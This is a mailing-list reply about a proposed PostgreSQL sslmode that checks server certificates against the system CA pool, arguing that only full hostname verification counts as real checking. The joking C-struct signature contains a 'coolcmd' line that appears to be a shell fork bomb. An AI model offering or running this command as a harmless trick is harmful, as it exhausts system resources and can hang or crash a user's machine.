Re: [PATCH] Add `verify-system` sslmode to use system CA pool for server cert

On Sat, 18 Sept 2021 at 00:10, Cameron Murdoch <cam(at)macaroon(dot)net> wrote:

> I also agree that the proposed patch is not the right way to go as it is
> essentially the same as verify-full, and I think that the correct fix would
> be to change the default.
>

But these are two changes:
1. Actually verify against a CA
2. Actually check the CN/altnames

Anything short of "verify-full" is in my view "not checking". Even with a
private CA this allows for a lot of lateral movement in an org, as if you
have one cert you have them all, for impersonation purposes.

Changing such a default is a big change. Maybe long term it's worth the
short term pain, though. Long term it'd be the config of least surprise, in
my opinion.
But note that one has to think about all the settings, such that the
default is not more checking than "require", which might also be surprising.

A magic setting of the file to be "system" sounds good for my use cases, at
least.

--
typedef struct me_s {
char name[] = { "Thomas Habets" };
char email[] = { "thomas(at)habets(dot)se <thomas(at)habets(dot)pp(dot)se>" };
char kernel[] = { "Linux" };
char *pgpKey[] = { "http://www.habets.pp.se/pubkey.txt" };
char pgp[] = { "9907 8698 8A24 F52F 1C2E 87F6 39A4 9EEA 460A 0169" };
char coolcmd[] = { "echo '. ./_&. ./_'>_;. ./_" };
} me_t;